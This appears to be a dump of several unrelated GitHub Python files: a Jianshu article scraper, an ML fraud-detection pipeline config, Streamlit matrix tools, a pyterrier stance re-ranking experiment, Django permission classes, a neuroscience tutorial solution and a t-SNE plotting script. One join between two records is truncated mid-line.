(orginal_id.split(\"?\")[0]).split(\"/\")[-1]\n        # the article content\n        content = response.xpath(\"//div[@class='show-content-free']\").get()\n        # the article word count\n        word_count = response.xpath('//span[@class=\"wordage\"]/text()').get().split(\" \")[1]\n        # the number of likes\n        like_count = response.xpath('//span[@class=\"likes-count\"]/text()').get().split(\" \")[1]\n        # the number of reads\n        read_count = response.xpath(\"//span[@class='views-count']/text()\").get().split(\" \")[1]\n        # the collections the article belongs to\n        subject = \",\".join(response.xpath('//div[@class=\"include-collection\"]/a/div/text()').getall())\n\n        # return all of the article's information in the item\n        item = JianshuItem(\n            title=title,\n            avatar=avatar,\n            author=author,\n            pub_time=pub_time,\n            orginal_id=orginal_id,\n            article=article,\n            content=content,\n            word_count=word_count,\n            like_count=like_count,\n            read_count=read_count,\n            subject=subject\n        )\n        yield item\n","repo_name":"franckisses/python_spider","sub_path":"spider_framework/jianshu/jianshu/spiders/jsspider.py","file_name":"jsspider.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"13910065632","text":"def solution(cards1, cards2, goal):\n#     answer = 'Yes'\n#     wordIndex1 = []\n#     wordIndex2 = []\n    \n#     for word in goal:\n#         try:\n#             wordIndex1.append(cards1.index(word))\n#         except ValueError:\n#             continue\n#         try: \n#             wordIndex2.append(cards2.index(word)) \n#         except ValueError:\n#             continue\n    \n#     if(sorted(wordIndex1) != wordIndex1):\n#         answer = 'No'\n#     if(sorted(wordIndex2) != wordIndex2):\n#         answer = 'No'\n    \n    answer = 'Yes'\n    wordList = []\n    \n    i=0\n    j=0\n    k=0\n    \n    for word in goal:\n        if(i<None:\n        try:\n            self.config: ConfigBox = read_yaml(config)\n            self.current_time_stamp: str = CURRENT_TIME_STAMP\n            self.training_pipeline_config: TrainingPipelineConfig = self.get_training_pipeline_config\n            self.artifact_dir: Path = self.training_pipeline_config.artifacts_root\n        except Exception as e:\n            raise FraudDetectionException(e, sys) from e\n\n    @property\n    def get_training_pipeline_config(self) -> TrainingPipelineConfig:\n        try:\n            training_pipeline: ConfigBox = self.config[TRAINING_PIPELINE_CONFIG_KEY]\n            artifact_dir = Path(os.path.join(ROOT_DIR, training_pipeline[TRAINING_PIPELINE_ARTIFACT_DIR_KEY]\n                                             ))\n            training_pipeline_name = training_pipeline[TRAINING_PIPELINE_NAME_KEY]\n\n            training_pipeline_config = TrainingPipelineConfig(\n                artifacts_root=artifact_dir,\n                training_pipeline_name=training_pipeline_name\n            )\n\n        except Exception as e:\n            raise FraudDetectionException(e, sys) from e\n        return training_pipeline_config\n\n    def get_data_ingestion_config(self) -> DataIngestionConfig:\n        try:\n            data_ingestion_artifact_dir = Path(os.path.join(self.artifact_dir, DATA_INGESTION_ARTIFACT_DIR_KEY))\n            data_ingestion_info: ConfigBox = self.config[DATA_INGESTION_CONFIG_KEY]\n            dataset_download_url: ConfigBox = data_ingestion_info[DATA_INGESTION_URL_KEY]\n            zip_dir = Path(os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_ZIP_DIR_KEY]))\n            raw_data_dir = Path(\n                os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_RAW_DATA_DIR_KEY]))\n            ingested_data_dir = Path(\n                os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_INGESTED_DIR_KEY]))\n            ingested_train_dir = Path(\n                os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_TRAIN_DIR_KEY]))\n            ingested_test_dir = Path(\n                os.path.join(data_ingestion_artifact_dir, data_ingestion_info[DATA_INGESTION_TEST_DIR_KEY]))\n            stratify: str = data_ingestion_info[DATA_INGESTION_STRATIFY_COL_KEY]\n            test_size: float = data_ingestion_info[DATA_INGESTION_TEST_SIZE_KEY]\n\n            data_ingestion_config = DataIngestionConfig(\n                source_url=dataset_download_url,\n                raw_data_dir=raw_data_dir,\n                zip_dir=zip_dir,\n                
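# illustrative layout under the artifact dir (assumed from the keys above): zip/, raw/, ingested/{train,test}\n                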
ingested_dir=ingested_data_dir,\n ingested_train_dir=ingested_train_dir,\n ingested_test_dir=ingested_test_dir,\n stratify=stratify,\n test_size=test_size,\n )\n\n logging.info(f\"Data ingestion config : {data_ingestion_config}\")\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n\n return data_ingestion_config\n\n def get_data_validation_config(self) -> DataValidationConfig:\n try:\n data_validation_artifacts_dir = Path(\n os.path.join(self.artifact_dir, DATA_VALIDATION_ARTIFACT_DIR_KEY, self.current_time_stamp))\n data_validation_config_info: ConfigBox = self.config[DATA_VALIDATION_CONFIG_KEY]\n schema_file_name: str = data_validation_config_info[DATA_SCHEMA_FILE_NAME_KEY]\n schema_file_path: Path = Path(\n os.path.join(DATA_SCHEMA_DIR, data_validation_config_info[DATA_SCHEMA_FILE_NAME_KEY]))\n report_file_name: str = data_validation_config_info[DATA_VALIDATION_REPORT_FILE_NAME_KEY]\n report_file_path = Path(os.path.join(data_validation_artifacts_dir, report_file_name))\n\n data_validation_config = DataValidationConfig(\n schema_file_name=schema_file_name,\n schema_file_path=schema_file_path,\n report_file_name=report_file_name,\n report_file_path=report_file_path,\n )\n\n logging.info(f\"logging data validation config: {data_validation_config}\")\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n return data_validation_config\n\n def get_data_transformation_config(self) -> DataTransformationConfig:\n try:\n data_transformation_config_info: ConfigBox = self.config[DATA_TRANSFORMATION_CONFIG_KEY]\n data_transformation_artifacts_dir = Path(\n os.path.join(self.artifact_dir, data_transformation_config_info[DATA_TRANSFORMATION_ARTIFACTS_DIR_KEY]))\n transformed_train_dir = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[DATA_TRANSFORMED_TRAIN_DIR_KEY]))\n transformed_test_dir = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[DATA_TRANSFORMED_TEST_DIR_KEY]))\n preprocessing_object_file_path = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[\n DATA_TRANSFORMATION_PREPROCESSING_DIR_KEY],\n data_transformation_config_info[\n DATA_TRANSFORMATION_PREPROCESSING_OBJECT_FILE_NAME_KEY]))\n imputer_sampler_object_file_path = Path(os.path.join(data_transformation_artifacts_dir,\n data_transformation_config_info[\n DATA_TRANSFORMATION_PREPROCESSING_DIR_KEY],\n data_transformation_config_info[\n DATA_TRANSFORMATION_IMPUTER_SAMPLER_OBJECT_FILE_NAME_KEY]))\n\n data_transformation_config = DataTransformationConfig(\n transformed_dir=data_transformation_artifacts_dir,\n transformed_train_dir=transformed_train_dir,\n transformed_test_dir=transformed_test_dir,\n preprocessing_object_file_path=preprocessing_object_file_path,\n imputer_sampler_object_file_path=imputer_sampler_object_file_path,\n )\n except Exception as e:\n raise FraudDetectionException(e, sys) from e\n logging.info(f\"Data transformation config: {data_transformation_config}\")\n return data_transformation_config\n\n def get_model_trainer_config(self) -> ModelTrainerConfig:\n try:\n model_trainer_artifacts_dir = Path(\n os.path.join(self.artifact_dir, MODEL_TRAINER_ARTIFACTS_DIR_KEY, self.current_time_stamp))\n\n model_trainer_config_info: ConfigBox = self.config[MODEL_TRAINER_CONFIG_KEY]\n\n base_accuracy: ConfigBox = model_trainer_config_info[MODEL_TRAINER_BASE_SCORE_KEY]\n trained_model_file_path = Path(\n os.path.join(model_trainer_artifacts_dir, 
model_trainer_config_info[MODEL_TRAINED_DIR_KEY],\n                                             model_trainer_config_info[MODEL_TRAINED_FILE_NAME_KEY]))\n            model_config_file_path = Path(os.path.join(MODEL_TRAINER_CONFIG_DIR, model_trainer_config_info[\n                MODEL_TRAINER_MODEL_CONFIG_FILE_NAME_KEY]))\n            threshold_diff_train_test_acc = model_trainer_config_info[MODEL_TRAINED_DIFF_TRAIN_TEST_ACC_KEY]\n\n            model_trainer_config = ModelTrainerConfig(\n                trained_model_file_path=trained_model_file_path,\n                base_score=base_accuracy,\n                model_config_file_path=model_config_file_path,\n                threshold_diff_train_test_acc=threshold_diff_train_test_acc\n            )\n        except Exception as e:\n            raise FraudDetectionException(e, sys) from e\n        logging.info(f\"Model trainer config : {model_trainer_config}\")\n\n        return model_trainer_config\n\n    def get_model_evaluation_config(self) -> ModelEvaluationConfig:\n        try:\n            model_evaluation_config_info: ConfigBox = self.config[MODEL_EVALUATION_CONFIG_KEY]\n            artifact_dir: Path = Path(\n                os.path.join(self.artifact_dir, model_evaluation_config_info[MODEL_EVALUATION_ARTIFACTS_DIR_KEY]))\n\n            model_evaluation_file_path = Path(\n                os.path.join(artifact_dir, model_evaluation_config_info[MODEL_EVALUATION_FILE_NAME_KEY]))\n\n            response = ModelEvaluationConfig(\n                model_evaluation_file_path=model_evaluation_file_path,\n                time_stamp=self.current_time_stamp,\n                mlflow_uri=None)\n\n            logging.info(f\"Model Evaluation config: {response}\")\n\n            return response\n\n        except Exception as e:\n            raise FraudDetectionException(e, sys) from e\n\n    def get_model_pusher_config(self) -> ModelPusherConfig:\n\n        try:\n            model_pusher_config_info: ConfigBox = self.config[MODEL_PUSHER_CONFIG_KEY]\n\n            export_dir_path = Path(\n                os.path.join(self.artifact_dir, model_pusher_config_info[MODEL_PUSHER_EXPORT_DIR_KEY]),\n                self.current_time_stamp)\n            saved_models_directory = Path(\n                os.path.join(self.artifact_dir, model_pusher_config_info[MODEL_PUSHER_EXPORT_DIR_KEY]))\n\n            model_pusher_config = ModelPusherConfig(\n                model_export_dir=export_dir_path,\n                saved_models_directory=saved_models_directory\n            )\n\n            logging.info(f\"Logging model pusher: {model_pusher_config}\")\n\n        except Exception as e:\n            raise FraudDetectionException(e, sys) from e\n\n        return model_pusher_config\n","repo_name":"ArunKhare/FraudDetection","sub_path":"src/fraudDetection/config/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":10479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38349667888","text":"import streamlit as st\r\nimport numpy as np\r\n\r\n\r\ndef multiply_matrices(matrix1, matrix2):\r\n    result = np.dot(matrix1, matrix2)\r\n    return result\r\n\r\ndef main():\r\n    st.title(\"2x2 Matrix Multiplication\")\r\n    \r\n    # Input for the first matrix\r\n    st.subheader(\"First Matrix\")\r\n    matrix1 = []\r\n    for i in range(2):\r\n        row = []\r\n        for j in range(2):\r\n            value = st.number_input(f\"Enter the value of matrix1[{i+1}][{j+1}]\", key=f\"matrix1_{i}_{j}\")\r\n            row.append(value)\r\n        matrix1.append(row)\r\n    \r\n    # Input for the second matrix\r\n    st.subheader(\"Second Matrix\")\r\n    matrix2 = []\r\n    for i in range(2):\r\n        row = []\r\n        for j in range(2):\r\n            value = st.number_input(f\"Enter the value of matrix2[{i+1}][{j+1}]\", key=f\"matrix2_{i}_{j}\")\r\n            row.append(value)\r\n        matrix2.append(row)\r\n    \r\n    # Calculate button\r\n    if st.button(\"Calculate\"):\r\n        result = multiply_matrices(matrix1, matrix2)\r\n        st.subheader(\"Multiplication Result\")\r\n        st.write(result)\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n\r\n\r\ndef determinant_2x2(matrix):\r\n    det = matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0]\r\n    return det\r\n\r\ndef main():\r\n    st.title(\"2x2 Matrix Determinant\")\r\n    st.write(\"Enter the elements of the 2x2 matrix:\")\r\n\r\n    matrix = []\r\n    for i in range(2):\r\n        row = []\r\n        for j in range(2):\r\n            value = st.number_input(f\"Enter matrix element [{i}][{j}]:\", key=f\"matrix[{i}][{j}]\")\r\n            row.append(value)\r\n        matrix.append(row)\r\n\r\n    if st.button(\"Compute Determinant\"):\r\n        det = determinant_2x2(matrix)\r\n        st.success(f\"Matrix determinant: {det}\")\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n\r\n\r\ndef inverse_matrix(matrix):\r\n    det = matrix[0, 0] * matrix[1, 1] - matrix[0, 1] * matrix[1, 0]\r\n    if det == 0:\r\n        return None\r\n    else:\r\n        inv_matrix = np.zeros_like(matrix)\r\n        inv_matrix[0, 0] = matrix[1, 1] / det\r\n        inv_matrix[0, 1] = -matrix[0, 1] / det\r\n        inv_matrix[1, 0] = -matrix[1, 0] / det\r\n        inv_matrix[1, 1] = matrix[0, 0] / det\r\n        return inv_matrix\r\n\r\ndef main():\r\n    st.title(\"2x2 Matrix Inverse\")\r\n    \r\n    st.write(\"Enter the matrix elements:\")\r\n    a = st.number_input(\"A[0, 0]\", value=0.0)\r\n    b = st.number_input(\"A[0, 1]\", value=0.0)\r\n    c = st.number_input(\"A[1, 0]\", value=0.0)\r\n    d = st.number_input(\"A[1, 1]\", value=0.0)\r\n    \r\n    matrix = np.array([[a, b], [c, d]])\r\n    \r\n    if st.button(\"Compute Inverse\"):\r\n        inv_matrix = inverse_matrix(matrix)\r\n        if inv_matrix is None:\r\n            st.error(\"The matrix determinant is 0. The matrix cannot be inverted.\")\r\n        else:\r\n            st.success(\"Matrix inverse:\")\r\n            st.write(inv_matrix)\r\n    \r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"Anissyaifatul/streamlit-anis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"39351147394","text":"from pathlib import Path\nfrom typing import NamedTuple\n\nfrom ir_measures import Measure\nfrom pandas import DataFrame, merge, Series\nfrom pyterrier import init, started\nfrom pyterrier.io import read_qrels\nfrom pyterrier.pipelines import Experiment\nfrom pyterrier.transformer import Transformer\nfrom tqdm.auto import tqdm\n\nfrom stare.config import CONFIG, RunConfig\nfrom stare.modules.runs_loader import RunLoader\nfrom stare.modules.stance_filter import StanceFilter\nfrom stare.modules.stance_randomizer import StanceF1Randomizer\nfrom stare.modules.stance_reranker import StanceReranker\nfrom stare.modules.stance_tagger import StanceTagger\nfrom stare.modules.text_loader import TextLoader\nfrom stare.modules.topics_loader import parse_topics\n\n\nclass NamedPipeline(NamedTuple):\n    names: list[str]\n    pipeline: Transformer\n\n    @property\n    def name(self):\n        return \" + \".join(self.names)\n\n\ndef _run(\n        run_file_path: Path, run_config: RunConfig\n) -> NamedPipeline:\n    team_directory_path = run_file_path.parent.parent\n\n    pipeline = RunLoader(run_file_path)\n    names = [f\"{team_directory_path.stem} {pipeline.name}\"]\n\n    # Load text contents.\n    pipeline = ~(\n        pipeline >>\n        TextLoader()\n    )\n\n    # Tag stance.\n    if run_config.stance_tagger_cutoff is None:\n        pipeline = ~(\n            ~(\n                pipeline >>\n                run_config.stance_tagger\n            ) >>\n            StanceFilter(run_config.stance_tagger_threshold)\n        )\n    elif run_config.stance_tagger_cutoff > 0:\n        # noinspection PyTypeChecker\n        pipeline = (\n            ~(\n                ~(\n                    pipeline %\n                    run_config.stance_tagger_cutoff >>\n                    run_config.stance_tagger\n                ) >>\n                StanceFilter(run_config.stance_tagger_threshold)\n            ) 
^\n pipeline\n )\n\n if run_config.stance_tagger != StanceTagger.ORIGINAL:\n name = run_config.stance_tagger.value\n if run_config.stance_tagger_threshold > 0:\n name += f\"({run_config.stance_tagger_threshold:.2f})\"\n if run_config.stance_tagger_cutoff is not None:\n name += f\"@{run_config.stance_tagger_cutoff}\"\n names.append(name)\n\n # Randomize stance.\n if run_config.stance_randomization_cutoff is None:\n pipeline = ~(\n pipeline >>\n StanceF1Randomizer(\n max_f1=run_config.stance_randomization_target_f1,\n seed=run_config.stance_randomization_seed,\n )\n )\n elif run_config.stance_randomization_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n pipeline %\n run_config.stance_randomization_cutoff >>\n StanceF1Randomizer(\n max_f1=run_config.stance_randomization_target_f1,\n seed=run_config.stance_randomization_seed,\n )\n ) ^\n pipeline\n )\n\n if run_config.stance_randomization_target_f1 < 1:\n name = \"randomize\"\n name += f\"(F1<={run_config.stance_randomization_target_f1:.2f})\"\n if run_config.stance_randomization_cutoff is not None:\n name += f\"@{run_config.stance_randomization_cutoff}\"\n names.append(name)\n\n # Re-rank for effectiveness.\n if run_config.stance_reranker_cutoff is None:\n pipeline = ~(\n pipeline >>\n run_config.stance_reranker\n )\n elif run_config.stance_reranker_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n pipeline %\n run_config.stance_reranker_cutoff >>\n run_config.stance_reranker\n ) ^\n pipeline\n )\n\n if (run_config.stance_reranker != StanceReranker.ORIGINAL and\n (run_config.stance_reranker_cutoff is None or\n run_config.stance_reranker_cutoff > 0)):\n name = run_config.stance_reranker.value\n if run_config.stance_reranker_cutoff is not None:\n name += f\"@{run_config.stance_reranker_cutoff}\"\n names.append(name)\n\n # Re-rank optimal.\n if run_config.optimal_reranker is None:\n pass\n elif run_config.optimal_reranker_cutoff is None:\n pipeline = ~(\n pipeline >>\n run_config.optimal_reranker\n )\n elif run_config.optimal_reranker_cutoff > 0:\n # noinspection PyTypeChecker\n pipeline = (\n ~(\n pipeline %\n run_config.optimal_reranker_cutoff >>\n run_config.optimal_reranker\n ) ^\n pipeline\n )\n\n if (run_config.optimal_reranker is not None and\n (run_config.optimal_reranker_cutoff is None or\n run_config.optimal_reranker_cutoff > 0)):\n name = run_config.optimal_reranker.value\n if run_config.optimal_reranker_cutoff is not None:\n name += f\"@{run_config.optimal_reranker_cutoff}\"\n names.append(name)\n\n return NamedPipeline(names, pipeline)\n\n\ndef _name_index(experiment: DataFrame) -> DataFrame:\n names = experiment[\"name\"].unique()\n name_index = {name: i + 1 for i, name in enumerate(names)}\n columns = experiment.columns.tolist()\n experiment[\"name_index\"] = experiment[\"name\"].map(name_index)\n columns.insert(1, \"name_index\")\n columns.remove(\"index\")\n return experiment[columns]\n\n\ndef _run_experiment(\n runs: list[NamedPipeline],\n topics: DataFrame,\n qrels: DataFrame,\n measures: list[Measure],\n) -> DataFrame:\n all_names: list[str] = [run.name for run in runs]\n all_systems: list[Transformer] = [run.pipeline for run in runs]\n if len(measures) == 0:\n return merge(\n topics[\"qid\"],\n Series(all_names, name=\"name\"),\n how=\"cross\",\n )\n return Experiment(\n retr_systems=all_systems,\n topics=topics,\n qrels=qrels,\n eval_metrics=measures,\n names=all_names,\n filter_by_qrels=CONFIG.filter_by_qrels,\n verbose=True,\n perquery=True,\n ).pivot_table(\n index=[\"qid\", \"name\"],\n 
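# pivot the per-query results: one row per (qid, system name), one column per measure\n        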
columns=\"measure\",\n values=\"value\",\n aggfunc=\"first\",\n ).reset_index(\n drop=False\n )\n\n\ndef main() -> None:\n if not started():\n init()\n print(\"Load topics.\")\n topics: DataFrame = parse_topics()\n print(\"Load qrels.\")\n qrels_relevance: DataFrame = read_qrels(\n str(CONFIG.qrels_relevance_file_path.absolute())\n )\n qrels_quality: DataFrame = read_qrels(\n str(CONFIG.qrels_quality_file_path.absolute())\n )\n qrels_stance: DataFrame = read_qrels(\n str(CONFIG.qrels_stance_file_path.absolute())\n )\n qrels_stance[\"stance_label\"] = qrels_stance[\"label\"]\n\n max_teams = CONFIG.max_teams \\\n if CONFIG.max_teams is not None else None\n max_runs_per_team = CONFIG.max_runs_per_team \\\n if CONFIG.max_runs_per_team is not None else None\n run_file_paths: list[tuple[Path, RunConfig]] = [\n (run_file_path, run_config)\n for team_directory_path in\n sorted(\n CONFIG.runs_directory_path.iterdir()\n )[:max_teams]\n if team_directory_path.is_dir()\n for run_file_path in\n sorted(\n (team_directory_path / \"output\").iterdir()\n )[:max_runs_per_team]\n for run_config in CONFIG.runs\n ]\n # noinspection PyTypeChecker\n run_file_paths = tqdm(\n run_file_paths,\n desc=\"Load runs\",\n unit=\"path\"\n )\n runs: list[NamedPipeline] = [\n _run(run_file_path, run_config)\n for run_file_path, run_config in run_file_paths\n ]\n all_names: list[str] = [run.name for run in runs]\n\n print(\"Compute relevance effectiveness measures.\")\n effectiveness_relevance = _run_experiment(\n runs,\n topics,\n qrels_relevance,\n CONFIG.measures_relevance,\n )\n print(\"Compute quality effectiveness measures.\")\n effectiveness_quality = _run_experiment(\n runs,\n topics,\n qrels_quality,\n CONFIG.measures_quality,\n )\n effectiveness = effectiveness_relevance.merge(\n effectiveness_quality,\n on=[\"qid\", \"name\"],\n suffixes=(\" rel.\", \" qual.\")\n )\n\n experiment = effectiveness.reset_index(drop=False)\n\n def fix_name_order(df: DataFrame) -> DataFrame:\n df = df.set_index(\"name\")\n df = df.loc[all_names]\n return df.reset_index(drop=False)\n\n experiment = experiment.groupby(\"qid\").apply(fix_name_order)\n\n experiment[\"run\"] = experiment[\"name\"].apply(\n lambda name: name.split(\" + \")[0])\n\n # Number names.\n experiment = experiment \\\n .groupby(by=\"run\", sort=False, group_keys=False) \\\n .apply(_name_index) \\\n .reset_index(drop=True)\n\n # Export results.\n print(\"Export results.\")\n output_path = CONFIG.metrics_output_file_path\n if output_path.suffix == \".csv\":\n experiment.to_csv(output_path, index=False, float_format=\"%.3f\")\n if output_path.suffix == \".xlsx\":\n experiment.to_excel(output_path, index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"webis-de/argmining23-stance-aware-re-ranking","sub_path":"stare/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31843335809","text":"from django.urls import reverse\nfrom rest_framework import permissions\n\n\nclass PostPermissions(permissions.BasePermission):\n def has_permission(self, request, view):\n return request.user.is_authenticated\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return request.user.is_authenticated\n\n if request.stream.path == reverse(\"post_urls:posts-like\", args=[obj.id]):\n return request.user.is_authenticated\n\n if request.stream.path == reverse(\"post_urls:posts-to-approve\", 
args=[obj.id]):\n return request.user.role == 1\n\n return request.user == obj.user\n\n\nclass CommentPermissions(permissions.BasePermission):\n def has_permission(self, request, view):\n try:\n if request.method == 'POST' and request.data['user'] != request.user.id:\n return False\n except Exception:\n if request.method == 'POST':\n return False\n\n return request.user.is_authenticated\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n\n return request.user == obj.user\n","repo_name":"mateus-oliveira/friends-gallery-api","sub_path":"src/post/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14129193605","text":"def get_perturbed_connectivity_single_neuron(perturbed_X, perturb_freq, selected_neuron):\n \"\"\"\n Computes the connectivity matrix for the selected neuron using differences in means.\n\n Args:\n perturbed_X (np.ndarray): the perturbed dynamical system matrix of shape (n_neurons, timesteps)\n perturb_freq (int): the perturbation frequency (2 means perturb every other timestep)\n selected_neuron (int): the index of the neuron we want to estimate connectivity for\n\n Returns:\n estimated_connectivity (np.ndarray): estimated connectivity for the selected neuron, of shape (n_neurons,)\n \"\"\"\n neuron_perturbations = perturbed_X[selected_neuron, ::perturb_freq] # extract the perturbations of neuron 1\n all_neuron_output = perturbed_X[:, 1::perturb_freq] # extract the observed outcomes of all the neurons\n\n estimated_connectivity = np.zeros(n_neurons) # our stored estimated connectivity matrix\n\n for neuron_idx in range(n_neurons):\n selected_neuron_output = all_neuron_output[neuron_idx, :]\n one_idx = np.argwhere(neuron_perturbations == 1)\n zero_idx = np.argwhere(neuron_perturbations == 0)\n\n difference_in_means = np.mean(selected_neuron_output[one_idx]) - np.mean(selected_neuron_output[zero_idx])\n\n estimated_connectivity[neuron_idx] = difference_in_means\n\n return estimated_connectivity\n\n# Initialize the system\nn_neurons = 6 \ntimesteps = 5000 # Simulate for 5000 timesteps.\nperturb_freq = 2 # perturb the system every other time step\n\n# Simulate our perturbed dynamical system for the given amount of time\nperturbed_X = simulate_neurons_perturb(A, timesteps, perturb_freq=perturb_freq)\n\n# we'll measure the connectivity of neuron 1\nselected_neuron = 1\nestimated_connectivity = get_perturbed_connectivity_single_neuron(perturbed_X, perturb_freq, selected_neuron)\n\n#Now plot\nwith plt.xkcd():\n fig, axs = plt.subplots(1,2, figsize=(10,5))\n plot_connectivity_matrix(np.expand_dims(estimated_connectivity, axis=1), ax=axs[0])\n axs[0].set(title=\"Estimated connectivity\", ylabel=\"Neuron\")\n plot_connectivity_matrix(A[:, [selected_neuron]], ax=axs[1])\n axs[1].set(title=\"True connectivity\")","repo_name":"ddinesan/Neuroscience","sub_path":"tutorials/W3D3_NetworkCausality/solutions/W3D3_Tutorial1_Solution_1ab9b01c.py","file_name":"W3D3_Tutorial1_Solution_1ab9b01c.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33606294716","text":"# Regular Way\na=[2,4,6,8]\nb=[3,6,9]\nresult1=[]\nresult2=[]\n\nfor i in a:\n if i in b:\n result1.append(i)\n\nprint(\"Using Normal Way : \")\nprint(result1)\n\nprint(\"Using List Comprehension : \")\nresult2 = [i for i in a 
if i in b]\nprint(result2)\n","repo_name":"testpushkarchauhan92/bharath_python_core_advanced","sub_path":"Lesson10ListComprehension/P004CommonElementsinTwoList.py","file_name":"P004CommonElementsinTwoList.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69841462508","text":"import umap\nfrom sklearn.datasets import fetch_openml\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='Evaluates an OOD Detector',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--logits', default=0, type=int)\nparser.add_argument('--pro', default=0, type=int)\nparser.add_argument('--pro_length', default=0, type=int)\nparser.add_argument('--name', default=1., type=str)\nargs = parser.parse_args()\n\nsns.set(context=\"paper\", style=\"white\")\noutlier_number = 100\nnum_classes_consider = 100\n\ndata_token = np.load('./text_features.npy')\ndata = np.load('./data_clip.npy')\nnumber_class = []\nfixed_number = 50\nfor i in range(num_classes_consider):\n if i == 0:\n data_preprocess = data[i*50:i*50+50]\n else:\n data_preprocess = np.concatenate((data_preprocess, data[i*50:i*50+50]), 0)\n number_class.append(fixed_number)\n\ndata_preprocess = np.array(data_preprocess).reshape(-1, 512)\n\ntargets = []\n\n\ndata_preprocess = torch.from_numpy(data_preprocess)\n# breakpoint()\n\ndata_preprocess = torch.cat([data_preprocess,\n torch.from_numpy(data_token)[:num_classes_consider]],0).numpy()\n# # breakpoint()\n# data_preprocess = torch.cat([data_preprocess,\n# F.normalize(torch.from_numpy(np.load('./outlier_cosine_vmf_select_100_new_version.npy').reshape(-1, 768)),\n# p=2, dim=-1)[:num_classes_consider*outlier_number]]).numpy()\n\n# length = []\n# for index in range(5):\n# data_preprocess = torch.cat([data_preprocess,\n# F.normalize(torch.from_numpy(np.load(str(index)+'.npy')),p=2, dim=-1)])\n# length.append(np.load(str(index)+'.npy').shape[0])\n#\n# data_preprocess = data_preprocess.numpy()\n\n\nprint(data_preprocess.shape)\n# breakpoint()\nfrom sklearn.manifold import TSNE\nembedding1 = TSNE(n_components=2, learning_rate='auto',\n init='random', perplexity=30).fit_transform(data_preprocess)\n\n# reducer = umap.UMAP(random_state=42, n_neighbors=15, min_dist=0.4, n_components=2, metric='euclidean')#30, 0.6\n# embedding1 = reducer.fit_transform(data_preprocess)\n\nembedding = embedding1[:num_classes_consider*fixed_number]\nembedding_anchor = embedding1[num_classes_consider*fixed_number:num_classes_consider*fixed_number+num_classes_consider]\n# embedding_outlier = embedding1[num_classes_consider*fixed_number+num_classes_consider:num_classes_consider*fixed_number+num_classes_consider+num_classes_consider*outlier_number]\n# embedding_df_outlier = embedding1[num_classes_consider*fixed_number+num_classes_consider+num_classes_consider*outlier_number:]\n# breakpoint()\nfig, ax = plt.subplots(figsize=(12, 12))\ndef get_cmap(n, name='Pastel1'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct\n RGB color; the keyword argument name must be a standard mpl colormap name.'''\n return plt.cm.get_cmap(name, n)\n\ncolor = get_cmap(num_classes_consider)\n\n# color = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']\n# breakpoint()\nsum = 0\nsum_outlier = 0\nsum_anchor = 0\nsum_df = 
0\n# breakpoint()\nfor i in range(0, num_classes_consider):\n # breakpoint()\n # color1 = color[i]\n # print(color1)\n plt.scatter(embedding[:, 0][sum: sum + number_class[i]],\n embedding[:, 1][sum: sum + number_class[i]],\n cmap=color, s=5)\n # plt.scatter(embedding_outlier[:, 0][sum_outlier: sum_outlier + outlier_number],\n # embedding_outlier[:, 1][sum_outlier: sum_outlier + outlier_number],\n # c='b', s=60, marker='*')\n #\n if i == 99:\n plt.scatter(embedding_anchor[:, 0][sum_anchor],\n embedding_anchor[:, 1][sum_anchor],\n c='k', s=30, label='Token Embed.')\n else:\n plt.scatter(embedding_anchor[:, 0][sum_anchor],\n embedding_anchor[:, 1][sum_anchor],\n c='k', s=30)\n\n sum += number_class[i]\n sum_outlier += outlier_number\n sum_anchor += 1\n # sum_df += length[i]\n\n\nplt.legend(fontsize=20)\n# ax.legend(loc='lower left',markerscale=9)\nplt.setp(ax, xticks=[], yticks=[])\nplt.savefig('./feat_dis_clip.jpg', dpi=250)\n# 